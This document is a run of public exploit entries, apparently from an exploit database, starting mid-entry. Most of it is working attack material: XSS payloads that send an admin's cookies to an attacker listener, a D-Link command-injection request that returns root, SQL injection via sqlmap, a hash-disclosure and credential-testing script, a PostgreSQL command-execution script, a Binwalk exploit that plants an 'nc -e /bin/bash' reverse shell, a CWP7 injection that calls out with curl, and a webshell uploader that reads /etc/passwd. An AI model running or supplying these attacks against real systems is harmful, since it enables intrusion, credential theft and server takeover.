GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a
HTTP/2
Host: store.zippy.com.ua
Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```
[+] Response:
```
HTTP/2 200 OK
Server: nginx
Date: Sun, 29 Jan 2023 07:27:55 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546
Class \App\Pages\Chatgiflc<a
href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img
src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif">
does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>
```
## Proof and Exploit:
[href](https://streamable.com/aadj5c)
## Reference:
[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2021-09-17
# Exploit Author: Matteo Conti - https://deltaspike.io
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Ubuntu 18.04 - LAMP
# Description
The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,
maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.
# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)
# Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
# Prof of concept:
- From /contact.php, send a message containing the following payload in "title" or "message" fields:
<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
(the first url have to be an existing image)
- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php
- Your listener will receive the PHP session id.
# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
# Date: 2021/05
# Exploit Author: fu2x2000
# Version: Liferay Portal 6.2.5 or later
# CVE : CVE-2021-33990
import requests
import json
print (" Search this on Google #Dork for liferay
-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")
url ="URL Goes Here
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"
req = requests.get(url)
print req
sta = req.status_code
if sta == 200:
print ('Life Vulnerability exists')
cook = url
print cook
inject = "Command=FileUpload&Type=File&CurrentFolder=/"
#cook_inject = cook+inject
#print cook_inject
else:
print ('not found try a another method')
print ("solution restrict access and user groups")
# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability
# Google Dork: NA
# Date: 30/01/2023
# Exploit Author: Françoa Taffarel
# Vendor Homepage:
https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
# Software Link:
https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
# Version: DIR846enFW100A53DBR-Retail
# Tested on: D-LINK DIR-846
# CVE : CVE-2022-46552
D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote
command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist
parameter. This vulnerability is exploited via a crafted POST request.
### Malicious POST Request
```
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;
PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4
{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
```
### Response
```
HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68
{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
```
### Data from RCE Request
```
GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;
PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1
```
### Response
```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35
uid=0(root) gid=0(root)
```
# Exploit Title: Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)
# Date: 2023-01-02
# Exploit Author: Muhammad Navaid Zafar Ansari
# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip
# Version: 1.0
# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)
# CVE: Not Assigned Yet
# References: -
------------------------------------------------------------------------------------
1. Description:
----------------------
Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?' Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
2. Proof of Concept:
----------------------
Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.
Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql
SQLMap Response:
[*] starting @ 04:49:58 /2023-02-01/
[04:49:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK
---
[04:50:00] [INFO] testing MySQL
[04:50:00] [INFO] confirming MySQL
[04:50:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.55, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
3. Example payload:
----------------------
(boolean-based)
' AND 1=1 AND 'test'='test
4. Burpsuite request:
----------------------
GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip
Connection: close
## Title: bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 01.31.2023
## Vendor: https://bgerp.com/Bg/Za-sistemata
## Software: https://github.com/bgerp/bgerp/releases/tag/v22.31
## Reference: https://portswigger.net/kb/issues/00500b01_cookie-manipulation-reflected-dom-based
## Description:
The bgERP system suffers from unsecured login cookies in which cookies
are stored as very sensitive login and also login session information!
The attacker can trick the already login user and can steal the
already generated cookie from the system and can do VERY DANGEROUS
things with the already stored sensitive information.
This can be very expensive for all companies which are using this
system, please be careful!
Also, this system has a vulnerable search parameter for XSS-Reflected attacks!
## STATUS: HIGH Vulnerability
[+] Exploit:
```GET
GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1
HTTP/1.1
Host: 192.168.100.77:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.100.77:8080/Portal/Show
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0
Connection: close
Content-Length: 0
```
[+] Response after logout of the system:
```HTTP
HTTP/1.1 302 Found
Date: Tue, 31 Jan 2023 15:13:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: 0
Cache-Control: no-cache, must-revalidate
Location: /core_Users/login/?ret_url=bgerp%2FPortal%2FShow%2FrecentlySearch_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1_48f6f472
Connection: close
Content-Length: 2
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
OK
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bgERP/2023/brERP-v22.31-Cookie-Session-vulnerability%2BXSS-Reflected)
## Proof and Exploit:
[href](https://streamable.com/xhffdu)
## Time spent
`01:30:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure
# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US<https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability>
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle
import requests
import re
import hashlib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
if len(sys.argv) < 3:
print("Usage: python cve-2019-15993.py URL passwordfile")
sys.exit()
url = sys.argv[1]
file = sys.argv[2]
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def hash_value(value):
"""Calculate the SHA1 hash of a value."""
sha1 = hashlib.sha1()
sha1.update(value.encode('utf-8'))
return sha1.hexdigest()
def userName_parser(text, start_delimiter, end_delimiter):
results = []
iteration = 0
start = 0
while start >= 0:
start = text.find(start_delimiter, start)
if start >= 0:
start += len(start_delimiter)
end = text.find(end_delimiter, start)
if end >= 0:
results.append(text[start:end])
start = end + len(end_delimiter)
iteration = iteration + 1
return results
# retrieve the web page
response = requests.get(url, allow_redirects=False, verify=False)
# Read in the values from the file
with open(file, 'r') as f:
values = f.readlines()
values = [value.strip() for value in values]
hashes = {hash_value(value): value for value in values}
if response.status_code == 302:
print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")
url = response.headers["Location"] + "config/device/adminusersetting"
response=requests.get(url, verify=False)
if response.status_code == 200:
print("[*] Successful request to URL:", url + "\n")
content = response.text
users_names = userName_parser(content,"<userName>","</userName>")
sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)
print("SHA1 Hashes found:\n")
loops = 0
while loops < len(sha1_hashes):
print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n")
for sha1_hash in sha1_hashes:
if sha1_hash in hashes:
print("Match:", sha1_hash, hashes[sha1_hash])
print("\nTesting Credentials via API.\n\n")
payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash])
response_login = requests.get(payload, allow_redirects=False, verify=False)
headers = response_login.headers
if "sessionID" in headers:
print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n")
print(headers["sessionID"])
else:
print("Unable to sign in.")
loops = loops + 1
else:
print("Host is not vulnerable:", response.status_code)
[cid:2b37ad37-9b26-416d-b485-c88954c0ab53]
Ken Pyle
M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+
Main: 267-540-3337
Direct: 484-498-8340
Email: kp@cybir.com
Website: www.cybir.com
# Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 2023-02-01
# Exploit Author: Paulo Trindade (@paulotrindadec), Bruno Stabelini (@Bruno Stabelini), Diego Farias (@fulcrum) and Weslley Shaimon
# Github: https://github.com/paulotrindadec/CVE-2019-9193
# Version: PostgreSQL 9.6.1 on x86_64-pc-linux-gnu
# Tested on: Red Hat Enterprise Linux Server 7.9
# CVE: CVE-2019–9193
#!/usr/bin/python3
import sys
import psycopg2
import argparse
def parseArgs():
parser = argparse.ArgumentParser(description='PostgreSQL 9.6.1 Authenticated Remote Code Execution')
parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')
parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]')
parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to connect to the PostgreSQL DB [Default: postgres]')
parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to connect to the the PostgreSQL DB [Default: postgres]')
parser.add_argument('-c', '--command', nargs='?', help='System command to run')
args = parser.parse_args()
return args
def main():
try:
# Variables
RHOST = args.ip
RPORT = args.port
USER = args.user
PASS = args.password
print(f"\r\n[+] Connect to PostgreSQL - {RHOST}")
con = psycopg2.connect(host=RHOST, port=RPORT, user=USER, password=PASS)
if (args.command):
exploit(con)
else:
print ("[!] Add argument -c [COMMAND] to execute system commands")
except psycopg2.OperationalError as e:
print("Error")
print ("\r\n[-] Failed to connect with PostgreSQL")
exit()
def exploit(con):
cur = con.cursor()
CMD = args.command
try:
print('[*] Running\n')
cur.execute("DROP TABLE IF EXISTS triggeroffsec;")
cur.execute("DROP FUNCTION triggeroffsecexeccmd() cascade;")
cur.execute("DROP TABLE IF EXISTS triggeroffsecsource;")
cur.execute("DROP TRIGGER IF EXISTS shoottriggeroffsecexeccmd on triggeroffsecsource;")
cur.execute("CREATE TABLE triggeroffsec (id serial PRIMARY KEY, cmdout text);")
cur.execute("""CREATE OR REPLACE FUNCTION triggeroffsecexeccmd()
RETURNS TRIGGER
LANGUAGE plpgsql
AS $BODY$
BEGIN
COPY triggeroffsec (cmdout) FROM PROGRAM %s;
RETURN NULL;
END;
$BODY$;
""",[CMD,]
)
cur.execute("CREATE TABLE triggeroffsecsource(s_id integer PRIMARY KEY);")
cur.execute("""CREATE TRIGGER shoottriggeroffsecexeccmd
AFTER INSERT
ON triggeroffsecsource
FOR EACH STATEMENT
EXECUTE PROCEDURE triggeroffsecexeccmd();
""")
cur.execute("INSERT INTO triggeroffsecsource VALUES (2);")
cur.execute("TABLE triggeroffsec;")
con.commit()
returncmd = cur.fetchall()
for result in returncmd:
print(result)
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if con is not None:
con.close()
#print("Closed connection")
if __name__ == "__main__":
args = parseArgs()
main()
# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE)
# Exploit Author: Etienne Lacoche
# CVE-ID: CVE-2022-4510
import os
import inspect
import argparse
print("")
print("################################################")
print("------------------CVE-2022-4510----------------")
print("################################################")
print("--------Binwalk Remote Command Execution--------")
print("------Binwalk 2.1.2b through 2.3.2 included-----")
print("------------------------------------------------")
print("################################################")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("------------------Discovered by:----------------")
print("---------Q. Kaiser, ONEKEY Research Lab---------")
print("---------Exploit tested on debian 11------------")
print("################################################")
print("")
parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input .png file",default=1)
parser.add_argument("ip", help="Ip to nc listener",default=1)
parser.add_argument("port", help="Port to nc listener",default=1)
args = parser.parse_args()
if args.file and args.ip and args.port:
header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e")
lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n',' def init(self):\n',' if not os.path.exists("/tmp/.binwalk"):\n',' os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n',' with open("/tmp/.binwalk", "w") as f:\n',' f.write("1")\n',' else:\n',' os.remove("/tmp/.binwalk")\n', ' os.remove(os.path.abspath(__file__))\n',' shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n']
in_file = open(args.file, "rb")
data = in_file.read()
in_file.close()
with open("/tmp/plugin", "w") as f:
for line in lines:
f.write(line)
with open("/tmp/plugin", "rb") as f:
content = f.read()
os.system("rm /tmp/plugin")
with open("binwalk_exploit.png", "wb") as f:
f.write(data)
f.write(header_pfs)
f.write(content)
print("")
print("You can now rename and share binwalk_exploit and start your local netcat listener.")
print("")
// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Date: 2023-02-02
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://centos-webpanel.com/
// Affected Versions: version < 0.9.8.1147
// Tested on: Kali Linux
// CVE : CVE-2022-44877
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7
// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020
package main
import (
"bytes"
"crypto/tls"
"fmt"
"net/http"
"flag"
"time"
)
func main() {
var host,call string
flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")
flag.Parse()
banner := `
-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =-
- by Mayank Deshmukh (ColdFusionX)
`
fmt.Printf(banner)
fmt.Println("[*] Triggering cURL command")
fmt.Println("[*] Open Listener on " + call + "")
//Skip certificate validation
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
client := &http.Client{Transport: tr}
// Request URL
url := host + "/login/index.php?login=$(curl${IFS}" + call + ")"
// Request body
body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login"))
// Create HTTP client and send POST request
req, err := http.NewRequest("POST", url, body)
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
resp, err := client.Do(req)
if err != nil {
fmt.Println("Error sending request:", err)
return
}
time.Sleep(2 * time.Second)
defer resp.Body.Close()
fmt.Println("\n[*] Check Listener for OOB callback")
}
# Exploit Title: Responsive FileManager 9.9.5 - Remote Code Execution (RCE)
# Date: 02-Feb-2023
# Exploit Author: Galoget Latorre (@galoget)
# Vendor Homepage: https://responsivefilemanager.com
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.9.5/responsive_filemanager.zip
# Dockerfile: https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604
# Version: 9.9.5
# Language: Python 3.x
# Tested on:
# - Ubuntu 22.04.5 LTS 64-bit
# - Debian GNU/Linux 10 (buster) 64-bit
# - Kali GNU/Linux 2022.3 64-bit
# CVE: CVE-2022-46604 (Konstantin Burov)
#!/usr/bin/python3
# -*- coding:utf-8 -*-
import sys
import requests
from bs4 import BeautifulSoup
from termcolor import colored, cprint
# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py 127.0.0.1
def banner():
"""
Function to print the banner
"""
banner_text = """
_____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___
| | | | __| ___ |_ | |_ |_ | ___ | | | _| _| | | |
| --| | | __| |___| | _| | | _| _| |___| |_ | . | . | | |_ |
|_____|\\___/|_____| |___|___|___|___| |_|___|___|___| |_|
File Creation Extension Bypass in Responsive FileManager ≤ 9.9.5 (RCE)
Exploit Author: Galoget Latorre (@galoget)
CVE Author: Konstantin Burov
"""
print(banner_text)
def usage_instructions():
"""
Function that validates the number of arguments.
The aplication MUST have 2 arguments:
- [0]: Name of the script
- [1]: Target site, which can be a domain or an IP Address
"""
if len(sys.argv) != 2:
print("Usage: python3 exploit.py <target.site>")
print("Example: python3 exploit.py 127.0.0.1")
sys.exit(0)
def run_command(web_session, webshell_url, command_to_run):
"""
Function that:
- Interacts with the webshell to run a command
- Cleans the response of the webshell
- Returns the response object and the output of the command
"""
webshell_response = web_session.get(url = webshell_url + f"?cmd={command_to_run}", headers = headers)
command_output_soup = BeautifulSoup(webshell_response.text, 'html.parser')
return (webshell_response, command_output_soup.find('pre').text)
if __name__ == "__main__":
banner()
usage_instructions()
# Change this with the domain or IP address to attack
if sys.argv[1]:
host = sys.argv[1]
else:
host = "127.0.0.1"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
}
# URL to create a new file
target_url = f"http://{host}/filemanager/execute.php?action=create_file"
# Change this to customize the payload (i.e. The content of the malicious file that will be created)
payload = "<html><body><form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\"><input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\"><input type=\"SUBMIT\" value=\"Execute\"></form><pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?></pre></body></html>"
# oneliner_payload = " <?=`$_GET[_]`?>"
# URL to get a PHPSESSID value
cookie_url = f"http://{host}/filemanager/dialog.php"
# New Session
session = requests.Session()
# GET request to retrieve a PHPSESSID value
cprint(f"[*] Trying to get a PHPSESSID at {host}", "blue")
try:
session.get(url = cookie_url, headers = headers)
except:
cprint(f"[-] Something went wrong when trying to connect to '{host}'.", "red")
sys.exit(0)
if session.cookies.get_dict():
cprint("[+] PHPSESSID retrieved correctly.", "green")
cprint(f"[!] PHPSESSID: {session.cookies.get_dict()['PHPSESSID']}", "yellow")
else:
cprint("[-] Something went wrong when trying to get a PHPSESSID.", "red")
# Params, rename if you want
params = {"path": "shell.php", "path_thumb": "../thumbs/shell.php", "name": "shell.txt", "new_content": payload}
# POST request to create the webshell
cprint(f"\n[*] Attempting to create a webshell on {host}", "blue")
response = session.post(url = target_url, headers = headers, data = params)
# If the status code and the message match, we may have a webshell inside. ;)
if response.status_code == 200 and response.text == "File successfully saved.":
# Default webshell path
shell_url = f"http://{host}/source/shell.php"
# Verify if the shell was uploaded by running whoami and cat /etc/passwd
webshell, whoami_output = run_command(session, shell_url, "whoami")
webshell, passwd_output = run_command(session, shell_url, "cat /etc/passwd")
# Common users when getting a webshell
common_users = ["www-data", "apache", "nobody", "apache2", "root", "administrator", "admin"]
# Verify if the command was executed correctly
if webshell.status_code == 200 or whoami_output.lower() in common_users or "root:x::" in passwd_output:
cprint("[+] Webshell uploaded - Enjoy!", "green")
cprint(f"[!] Webshell available at '{shell_url}' - Enjoy!", "yellow")
cprint(f"[+] Running `whoami` command: {whoami_output}", "green")
# Ask to enter into a pseudo-interactive mode with the webshell
answer = input(colored("Do you want to enter into interactive mode with the webshell? (Y/N): ", "magenta"))
if answer.upper() == "Y":
cprint("\n[*] Entering into interactive mode, write 'exit' to quit.\n", "blue")
command = ""
while command != "exit":
command = input(colored(">> ", "cyan")).lower()
webshell, command_output = run_command(session, shell_url, command)
if command != "exit":
cprint(command_output, "cyan")
cprint("\n[*] Exiting...Bye!", "blue")
